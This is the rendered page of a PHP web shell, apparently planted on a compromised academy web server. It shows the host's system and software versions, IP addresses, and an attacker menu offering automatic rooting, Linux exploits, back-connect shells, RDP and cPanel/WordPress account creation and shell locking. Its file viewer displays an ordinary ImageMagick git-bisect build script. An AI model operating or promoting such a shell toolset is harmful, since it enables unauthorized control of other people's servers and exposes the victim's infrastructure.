Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
imagick /
bisect /
[ HOME SHELL ]
Name
Size
Permission
Action
bisect_analyze.sh
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bisect_analyze.sh
#!/bin/sh ######################################################### # How to run git bisect ######################################################### ## Check out ImageMagick # git clone https://github.com/ImageMagick/ImageMagick.git ## Put a known good version of Imagick into the directory /var/app/bisect/ImageMagick/imagick ## Update this script to run the relevant tests ## e.g. change php run-tests.php tests/316_Imagick_getImageKurtosis.phpt ## Start bisect session # git bisect start ## Find bad version of ImageMagick e.g. a particular tag that is broken # git checkout 963f5fa ## Mark that version as bad. # git bisect bad ## Find a good version # git checkout 99da019 ## Mark that version as good. # git bisect good ## Run the bisect automatically # git bisect run sh bisect_analyze.sh cd /var/app/bisect/ImageMagick ./configure --with-quantum-depth=16 \ --disable-dependency-tracking \ --with-magick-plus-plus=no \ --without-perl \ --disable-docs \ --with-openexr=yes \ --with-fontconfig=yes \ --with-fftw \ --with-heic=yes \ --with-jpeg=yes \ --with-png=yes \ --with-tiff=yes \ --with-urw-base35-font-dir=/usr/share/fonts/type1/urw-base35 \ --with-webp=yes make clean make install -j20 cd /var/app/bisect/ImageMagick/imagick phpize ./configure make install php run-tests.php tests/316_Imagick_getImageKurtosis.phpt
Close